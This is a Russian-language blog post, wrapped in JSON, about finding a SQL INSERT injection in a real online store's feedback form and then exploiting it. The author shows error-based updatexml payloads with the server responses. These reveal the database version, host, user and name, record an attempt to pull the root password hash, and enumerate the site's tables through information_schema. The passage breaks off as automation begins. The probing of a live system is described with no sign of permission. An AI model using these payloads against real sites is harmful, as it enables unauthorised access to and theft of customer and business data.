{"id":264171,"date":"2015-08-24T16:58:02","date_gmt":"2015-08-24T12:58:02","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=264171"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=264171","title":{"rendered":"SQL Insert Injection \u0432 \u043e\u0434\u043d\u043e\u043c \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0435"},"content":{"rendered":"

\t<\/a>
\u0414\u0430\u0432\u043d\u043e \u043d\u0430 \u0425\u0430\u0431\u0440\u0435 \u043d\u0435 \u0437\u0432\u0443\u0447\u0430\u043b\u0438 \u0438\u0441\u0442\u043e\u0440\u0438\u0438 \u043f\u0440\u043e SQL injection. \u0410 \u0443\u0436 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u043e\u0432 \u0438\u0437 \u0436\u0438\u0437\u043d\u0438 \u043f\u0440\u043e SQL INSERT injection \u0432\u043e\u043e\u0431\u0449\u0435 \u043e\u0447\u0435\u043d\u044c \u043c\u0430\u043b\u043e. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0443 \u0441\u0432\u043e\u044e.<\/p>\n

\u041b\u0438\u0440\u0438\u0447\u0435\u0441\u043a\u043e\u0435 \u0432\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435<\/b><\/p>\n
\u041b\u0438\u0440\u0438\u0447\u0435\u0441\u043a\u043e\u0435 \u0432\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435<\/b><\/p>\n

\u0412\u0441\u0451 \u043d\u0430\u0447\u0430\u043b\u043e\u0441\u044c \u0441 \u043c\u043e\u0435\u0433\u043e \u0436\u0435\u043b\u0430\u043d\u0438\u044f \u043a\u0443\u043f\u0438\u0442\u044c \u0441\u0435\u0431\u0435 \u043d\u0435\u0447\u0442\u043e \u043d\u0435\u0434\u0435\u0448\u0451\u0432\u043e\u0435 \u0432 \u0440\u0430\u0437\u0431\u043e\u0440\u043d\u043e\u043c \u0432\u0438\u0434\u0435 \u0432 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0435 A.B.ru \u0444\u0438\u0440\u043c\u044b B. \u041f\u043e\u0441\u043b\u0435 \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0441 \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440\u043e\u043c \u043f\u043e \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u0435, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u043e\u0441\u044b\u043b\u043a\u0438 \u0438 \u043e\u0431\u0437\u043e\u0440\u0430 \u0435\u0451 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043c\u0435\u0442\u0438\u0437\u043e\u0432 \u043e\u0447\u0435\u043d\u044c \u043d\u0435 \u0445\u0432\u0430\u0442\u0430\u0435\u0442. \u041f\u043e\u043b\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u0447\u043d\u044f \u0432\u0441\u0435\u0433\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0433\u043e \u043d\u0435 \u0431\u044b\u043b\u043e, \u043b\u0438\u0448\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u0431\u043e\u043b\u0442\u043e\u0432, \u0433\u0430\u0435\u043a \u0438 \u0448\u0430\u0439\u0431. \u042f \u043d\u0430\u0447\u0430\u043b \u0441\u0431\u043e\u0440\u043a\u0443, \u0434\u043e\u0439\u0434\u044f \u0434\u043e \u0442\u043e\u0433\u043e \u043c\u0435\u0441\u0442\u0430, \u0433\u0434\u0435 \u0431\u0435\u0437 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u0431\u043e\u043b\u0442\u043e\u0432 \u0443\u0436\u0435 \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043e\u0431\u043e\u0439\u0442\u0438\u0441\u044c. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043c\u043d\u043e\u044e \u0431\u044b\u043b\u043e \u0441\u043a\u0443\u0440\u043f\u0443\u043b\u0451\u0437\u043d\u043e \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043e \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043d\u0435 \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0445 \u043c\u0435\u0442\u0438\u0437\u043e\u0432 \u0438 \u0432\u044b\u0441\u043b\u0430\u043d\u043e \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u043c \u043f\u0438\u0441\u044c\u043c\u043e\u043c \u0442\u043e\u0439 \u0436\u0435 \u0434\u0435\u0432\u0443\u0448\u043a\u0435-\u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440\u0443, \u0441 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043c\u044b \u043e\u0431\u0449\u0430\u043b\u0438\u0441\u044c. \u041a \u0447\u0435\u0441\u0442\u0438 \u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430 \u0441\u0442\u043e\u0438\u0442 \u0441\u043a\u0430\u0437\u0430\u0442\u044c, \u0447\u0442\u043e \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0441\u0451 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0435 \u0431\u044b\u043b\u043e \u0432\u044b\u0441\u043b\u0430\u043d\u043e \u0432\u0442\u043e\u0440\u043e\u0439 \u043f\u043e\u0441\u044b\u043b\u043a\u043e\u0439. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u043d\u0430\u0447\u0430\u043b \u0441\u0431\u043e\u0440\u043a\u0443, \u0437\u0430\u0433\u043e\u043d\u044f\u044f \u0432 \u0434\u0430\u043b\u044c\u043d\u0438\u0439 \u0443\u0433\u043e\u043b \u0441\u0432\u043e\u0435\u0433\u043e \u0440\u0430\u0437\u0443\u043c\u0430 \u043e\u043f\u0430\u0441\u0435\u043d\u0438\u044f \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0447\u0442\u043e-\u0442\u043e \u0435\u0449\u0451. \u041d\u043e, \u0434\u043e\u0439\u0434\u044f \u0434\u043e \u0444\u0438\u043d\u0438\u0448\u043d\u043e\u0439 \u043f\u0440\u044f\u043c\u043e\u0439, \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e 1\/4-\u043e\u0439 \u0447\u0430\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u043d\u0435 \u0445\u0432\u0430\u0442\u0430\u0435\u0442 \u0432 \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0435, \u0441\u0443\u0434\u044f \u043f\u043e \u0444\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u044f\u043c \u0438\u0437 \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u0430 \u0438 \u0437\u0434\u0440\u0430\u0432\u043e\u043c\u0443 \u0441\u043c\u044b\u0441\u043b\u0443. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0437\u0430 \u043f\u0435\u0440\u0432\u044b\u043c \u043f\u0438\u0441\u044c\u043c\u043e\u043c \u043e \u043d\u0435\u0434\u043e\u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0442\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043b\u043e \u0432\u0442\u043e\u0440\u043e\u0435, \u043a\u0443\u0434\u0430 \u0431\u043e\u043b\u0435\u0435 \u043e\u0431\u0448\u0438\u0440\u043d\u043e\u0435, \u0430 \u0441\u0431\u043e\u0440\u043a\u0430 \u043e\u0442\u043b\u043e\u0436\u0435\u043d\u0430.
\u041a\u043e\u0433\u0434\u0430 \u043f\u0440\u043e\u0448\u043b\u0430 \u0432\u0442\u043e\u0440\u0430\u044f \u043d\u0435\u0434\u0435\u043b\u044f \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f, \u043c\u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0443\u0431\u0435\u0434\u0438\u0442\u044c \u0441\u0435\u0431\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0434\u0435\u0432\u0443\u0448\u043a\u0430-\u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440 \u0432\u044b\u0448\u043b\u0430 \u0432 \u043e\u0442\u043f\u0443\u0441\u043a. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u043f\u0435\u0440\u0435\u0441\u043b\u0430\u043b \u0435\u0439 \u043f\u0438\u0441\u044c\u043c\u043e \u0434\u0432\u0443\u0445\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u043e\u0439 \u0434\u0430\u0432\u043d\u043e\u0441\u0442\u0438 \u0435\u0449\u0451 \u0440\u0430\u0437 \u0438 \u043f\u0435\u0440\u0435\u0448\u0451\u043b \u043a \u043f\u043e\u0438\u0441\u043a\u0443 \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u0430\u043d\u0430\u043b\u043e\u0432 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u0441\u0432\u044f\u0437\u0438 \u2014 \u043e\u0447\u0435\u043d\u044c \u0443\u0436 \u043d\u0435 \u0445\u043e\u0442\u0435\u043b\u043e\u0441\u044c \u0437\u0432\u043e\u043d\u0438\u0442\u044c \u0432 \u041c\u043e\u0441\u043a\u0432\u0443. \u0412 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0442\u043e\u0436\u0435 \u0441\u0430\u043c\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e \u0431\u044b\u043b\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u043d\u0430 \u043e\u0431\u0449\u0438\u0439 \u044d\u043b-\u0430\u0434\u0440\u0435\u0441 A@B.ru, \u043d\u0430 \u0447\u0442\u043e \u0431\u044b\u043b \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u043d\u044b\u0439 \u043e\u0442\u0432\u0435\u0442: \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u043e\u0442\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0442\u044c \u043f\u0438\u0441\u044c\u043c\u043e \u0438\u0437-\u0437\u0430 \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u043d\u043e\u0433\u043e \u044f\u0449\u0438\u043a\u0430 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u0435\u043b\u044f <\u043c\u0443\u0436\u0438\u043a>@B.ru. \u0422\u043e\u0433\u0434\u0430 \u0431\u044b\u043b\u0430 \u043d\u0430\u0439\u0434\u0435\u043d\u0430 \u0444\u043e\u0440\u043c\u0430 \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0439 \u0441\u0432\u044f\u0437\u0438 \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 \u2014 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u043d\u0438\u0442\u043e\u0447\u043a\u0430 \u0441\u043e\u0435\u0434\u0438\u043d\u044f\u044e\u0449\u0430\u044f \u043c\u0435\u043d\u044f \u043d\u0430 \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u0441 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u043e\u043c. \u0412 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u044f \u043e\u043f\u0438\u0441\u0430\u043b \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u0447\u0442\u043e\u0432\u043e\u0433\u043e \u044f\u0449\u0438\u043a\u0430 \u0438 \u0432\u0441\u0442\u0430\u0432\u0438\u043b \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435 \u043e\u0431 \u043e\u0442\u043a\u0430\u0437\u0435 \u0434\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u043f\u0438\u0441\u044c\u043c\u043e, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u043e \u0432 \u0441\u0435\u0431\u0435 \u043e\u0434\u0438\u043d\u0430\u0440\u043d\u044b\u0435 \u043a\u0430\u0432\u044b\u0447\u043a\u0438\u2026 <\/div>\n<\/div>\n

\u041d\u0430\u0447\u0430\u043b\u043e<\/b><\/p>\n

\u041d\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0443 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u043e\u0442\u0447\u0451\u0442 \u043e\u0431 \u043e\u0448\u0438\u0431\u043a\u0435 \u0447\u0435\u0440\u0435\u0437 \u0444\u043e\u0440\u043c\u0443 \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0439 \u0441\u0432\u044f\u0437\u0438, \u043d\u0430 \u043f\u0430\u0440\u0443 \u0441\u0435\u043a\u0443\u043d\u0434 \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u043e\u0448\u0438\u0431\u043a\u0430, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0443\u0433\u0430\u0434\u044b\u0432\u0430\u043b\u0441\u044f \u0433\u043e\u043b\u043e\u0441 MySQL. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u043e\u0442\u043a\u0440\u044b\u043b \u043a\u043e\u043d\u0441\u043e\u043b\u044c \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430, \u043f\u043e\u0432\u0442\u043e\u0440\u0438\u043b \u0437\u0430\u043f\u0440\u043e\u0441 \u0438 \u0437\u0430\u0433\u043b\u044f\u043d\u0443\u043b \u0432 \u043e\u0442\u0432\u0435\u0442 \u0441\u0435\u0440\u0432\u0435\u0440\u0430:
<\/a> <\/p>\n

Error displaying the error page: Application Instantiation Error: You have an error in your SQL syntax; at line 1 SQL=INSERT INTO ab_com_feedback (`id`, `ordering`, `state`, `checked_out`, `checked_out_time`, `created_by`, `name`, `email`, `phone`, `ask`, `answer`, `createdate`, `changedate`, `userans`) VALUES (NULL, '0',  '1', '0', '2015-08-04 11:36:37', '', 'Max', '<\u043c\u043e\u0439 \u0430\u0434\u0440\u0435\u0441>@gmail.com', '', '\u0442\u0435\u043a\u0441\u0442, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0430\u0434\u0440\u0435\u0441 '<\u043c\u0443\u0436\u0438\u043a\u0430>@B.ru' \u043f\u0440\u044f\u043c\u043e \u0432 \u043e\u0434\u0438\u043d\u0430\u0440\u043d\u044b\u0445 \u043a\u0430\u0432\u044b\u0447\u043a\u0430\u0445.', '', '2015-08-04 11:36:37', '0000-00-00 00:00:00', '0'); <\/code><\/pre>\n
  \u0418\u0442\u0430\u043a, \u043d\u0430\u0439\u0434\u0435\u043d\u0430 SQL insert injection \u0432 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0435, \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u044f \u043e\u0442\u0434\u0430\u043b \u0441\u0432\u043e\u0438 \u043a\u0440\u043e\u0432\u043d\u044b\u0435. 
  \u0412 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u044f \u043d\u0430\u0448\u0451\u043b \u043f\u0430\u0440\u0443 \u0434\u043e\u0441\u0442\u043e\u0439\u043d\u044b\u0445 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u043e\u0432 \u043f\u043e \u0442\u0435\u043c\u0435. \u0421\u0430\u043c\u044b\u0439 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 \u0438\u0437 \u043d\u0438\u0445 SQL Injection in Insert, Update and Delete Statements (Osanda Malith Jayathissa)<\/a>. \u0411\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u0435\u043c\u0443, \u0432\u0437\u0433\u043b\u044f\u0434 \u0443\u043f\u0430\u043b \u043d\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044e updatexml<\/a>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0432 MySQL 5.1 (\u0442.\u0435. \u0435\u0441\u043b\u0438 \u043d\u0435 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0439 \u0432\u044b\u0432\u043e\u0434:<\/p>\n
UpdateXML(xml_target, xpath_expr, new_xml)<\/p><\/blockquote>\n
  \u0421\u043c\u044b\u0441\u043b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e\u0431\u044b \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0437\u0430\u0440\u0430\u043d\u0435\u0435 \u043d\u0435\u0432\u0435\u0440\u043d\u044b\u0439 XPath Expression (\u0432\u0442\u043e\u0440\u043e\u0439 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442). \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e Osanda \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u0435\u0442 \u0434\u0435\u043b\u0430\u0442\u044c \u043a\u043e\u043d\u043a\u0430\u0442\u0435\u043d\u0430\u0446\u0438\u044e \u0441 \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u043c "~". \u0427\u0442\u043e \u0436, \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u043c \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c MySQL:  <\/p>\n
mysql> select updatexml(1, '123', 0) from dual; +------------------------+ | updatexml(1, '123', 0) | +------------------------+ | NULL                   | +------------------------+ 1 row in set (0,00 sec) mysql> select updatexml(1, '~123', 0) from dual; ERROR 1105 (HY000): XPATH syntax error: '~123' <\/code><\/pre>\n
  \u0414\u0430, \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442. \u0422\u0435\u043f\u0435\u0440\u044c \u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u043c \u0442\u0435\u043b\u043e \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u043d\u0430\u0448\u0435\u0433\u043e \u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430. \u041f\u0435\u0440\u0432\u044b\u0439 \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0439\u0441\u044f \u0437\u0430\u043f\u0440\u043e\u0441 \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u043b \u0442\u0430\u043a:  <\/p>\n
message' or updatexml(1,concat(0x7e,(version())),0) or '', '0000-00-00 00:00:00', '0000-00-00 00:00:00', '1');--' <\/code><\/pre>\n
  \u041f\u043e\u0442\u043e\u043c \u044f \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u043f\u043e\u0434\u0443\u043c\u0430\u043b, \u0438 \u0441\u043e\u043a\u0440\u0430\u0442\u0438\u043b \u0435\u0433\u043e \u0434\u043e:  <\/p>\n
' or updatexml(1,concat(0x7e,(version())),0) or ' <\/code><\/pre>\n
  \u041e\u0442\u0432\u0435\u0442 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430:  <\/p>\n
Error displaying the error page: Application Instantiation Error: XPATH syntax error: '~5.5.41-MariaDB-log' SQL=INSERT INTO ab_com_feedback (`id`, `ordering`, `state`, `checked_out`, `checked_out_time`, `created_by`, `name`, `email`, `phone`, `ask`, `answer`, `createdate`, `changedate`, `userans`) VALUES (NULL, '0',  '1', '0', '2015-08-04 12:39:12', '', 'Ken', 'ken@mailinator.com', '', '' or updatexml(1,concat(0x7e,(version())),0) or '', '', '2015-08-04 12:39:12', '0000-00-00 00:00:00', '0'); <\/code><\/pre>\n
  \u0421\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u043e! \u0412\u0441\u0451 \u043a\u0440\u0443\u0442\u0438\u0442\u0441\u044f \u043d\u0430 MariaDB 5.5. \u041e\u0442\u043b\u0438\u0447\u0438\u044f \u043e\u0442 MySQL \u043c\u0438\u043d\u0438\u043c\u0430\u043b\u044c\u043d\u044b, \u0432\u0435\u0440\u0441\u0438\u044f 5.5 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u043e\u0432 \u0438 \u0444\u0443\u043d\u043a\u0446\u0438\u0439. \u041f\u0440\u043e\u0439\u0434\u044f\u0441\u044c \u043f\u043e \u0442\u0438\u043f\u0438\u0447\u043d\u044b\u043c \u0434\u043b\u044f \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0439 \u0434\u0430\u043d\u043d\u044b\u043c, \u044f \u0432\u044b\u0442\u0430\u0449\u0438\u043b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e:  <\/p>\n
version: 5.5.41-MariaDB-log hostname: db-www user: A@A.B.ru database: A <\/code><\/pre>\n
  \u0422\u0435\u043f\u0435\u0440\u044c \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u043e\u043b\u043d\u043e\u0446\u0435\u043d\u043d\u044b\u0445 SQL-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432. \u0412 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u0440\u0430\u0434\u0438 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0430, \u044f \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0442\u0430\u043a\u043e\u0439:  <\/p>\n
' or updatexml(0, concat(0x7e,(SELECT password FROM mysql.user WHERE user='root')), 0) or ' <\/code><\/pre>\n
  \u041d\u043e, \u0440\u0430\u0437\u0443\u043c\u0435\u0435\u0442\u0441\u044f, \u043f\u043e\u043b\u0443\u0447\u0438\u043b \u043e\u0442\u043a\u0430\u0437:  <\/p>\n
Error displaying the error page: Application Instantiation Error: SELECT command denied to user 'A'@'A.B.ru' for table 'user' SQL=INSERT INTO ab_com_feedback (`id`, `ordering`, `state`, `checked_out`, `checked_out_time`, `created_by`, `name`, `email`, `phone`, `ask`, `answer`, `createdate`, `changedate`, `userans`) VALUES (NULL, '0',  '1', '0', '2015-08-04 14:27:21', '', 'Ken', 'ken@mailinator.com', '', '' or updatexml(0, concat(0x7e,(SELECT password FROM mysql.user WHERE user='root')), 0) or '', '', '2015-08-04 14:27:21', '0000-00-00 00:00:00', '0'); <\/code><\/pre>\n
  \u0422\u0435\u043f\u0435\u0440\u044c \u043d\u0443\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u0442\u0430\u0431\u043b\u0438\u0446 \u0432 \u0442\u0435\u043a\u0443\u0449\u0435\u0439 \u0411\u0414. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0443\u044e \u0441 MySQL 5.0 \u043c\u0435\u0442\u0430-\u0442\u0430\u0431\u043b\u0438\u0446\u0443 information_schema<\/a>:  <\/p>\n
' or updatexml(0, concat(0x7e,(SELECT concat(table_schema, ':', table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0, 1)), 0) or ' <\/code><\/pre>\n
  \u041c\u0435\u043d\u044f\u044f \u043f\u0435\u0440\u0432\u044b\u0439 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 \u0432 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u0435 LIMIT, \u043c\u043e\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0431\u0440\u0430\u0442\u044c \u0432\u0441\u0435 \u0442\u0435\u043a\u0443\u0449\u0438\u0435 \u0442\u0430\u0431\u043b\u0438\u0446\u044b. \u041c\u0435\u043d\u044f \u0445\u0432\u0430\u0442\u0438\u043b\u043e \u043d\u0430 <\/p>\n
\u043f\u0435\u0440\u0432\u044b\u0435 20 \u0448\u0442\u0443\u043a<\/b><\/p>\n
\n
    aa:cart     aa:category     aa:includes     aa:items     aa:layout     aa:menu     aa:aabb_ak_profiles     aa:aabb_ak_stats     aa:aabb_ak_storage     aa:aabb_assets     aa:aabb_associations     aa:aabb_banner_clients     aa:aabb_banner_tracks     aa:aabb_banners     aa:aabb_categories     aa:aabb_com_feedback     aa:aabb_com_photo_votes     aa:aabb_com_photo_votes_comment     aa:aabb_com_photo_votes_likes     aa:aabb_com_wishlist <\/code><\/pre>\n
  <\/div>\n<\/div>\n
  \u0420\u0435\u0448\u0430\u044e \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c. \u0420\u0435\u0447\u044c \u0438\u0434\u0451\u0442 \u043e\u0431 AJAX POST-\u0437\u0430\u043f\u0440\u043e\u0441\u0435 \u0438 \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 \u0432\u043a\u043b\u044e\u0447\u0451\u043d jQuery. \u041d\u0430\u043c \u043d\u0443\u0436\u043d\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0441\u0440\u0430\u0437\u0443 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u2014 \u044d\u0442\u043e \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u0430\u044f \u0440\u0430\u0431\u043e\u0442\u0430, \u0442\u0430\u043a \u0447\u0442\u043e \u044f \u0440\u0435\u0448\u0438\u043b \u0441\u0440\u0430\u0437\u0443 \u043f\u043e\u0434\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 async<\/a> \u0438 \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u0441 \u0435\u0451 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0436\u0435\u043b\u0430\u0435\u043c\u044b\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u0442\u0430\u0431\u043b\u0438\u0446. \u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0430\u0441\u044c   <\/p>\n
\u043d\u0435 \u043e\u0447\u0435\u043d\u044c \u0438\u0437\u044f\u0449\u043d\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0438 \u043e\u0442\u0441\u044b\u043b\u043a\u0438 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u0430 \u043e\u0434\u043d\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432<\/b><\/p>\n
\n
